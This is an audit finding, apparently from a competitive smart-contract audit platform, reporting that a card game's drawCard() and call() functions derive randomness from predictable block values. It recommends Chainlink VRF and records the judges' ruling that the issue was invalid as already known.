block.prevrandao and block.timestamp are not reliable source of random number
Summary
block.prevrandao and block.timestamp are not reliable source of generating random numbers. But this logic works in drawCard() and call() function.
Vulnerability Details
The randomness is generated by hashing a predictable combination of block.timestamp, msg.sender, and block.prevrandao. Since these values are either public or predictable, the resulting hash can be predicted by an attacker.
So an attacker could exploit this weak randomness to draw favorable cards for themselves or force unfavorable cards for other players, disrupting the integrity of the game.
Impact
malicious attacker can manipulate game logic
fund loss
Tools Used
manual
Recommendations
Use safe random generator method such as chainlink VRF.
Lead Judging Commences
[INVALID] Known - Randomness
Randomness Manipulation: The randomness mechanism relies on block.timestamp, msg.sender, and block.prevrandao, which may be predictable in certain scenarios. Consider using Chainlink VRF or another oracle for more secure randomness.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.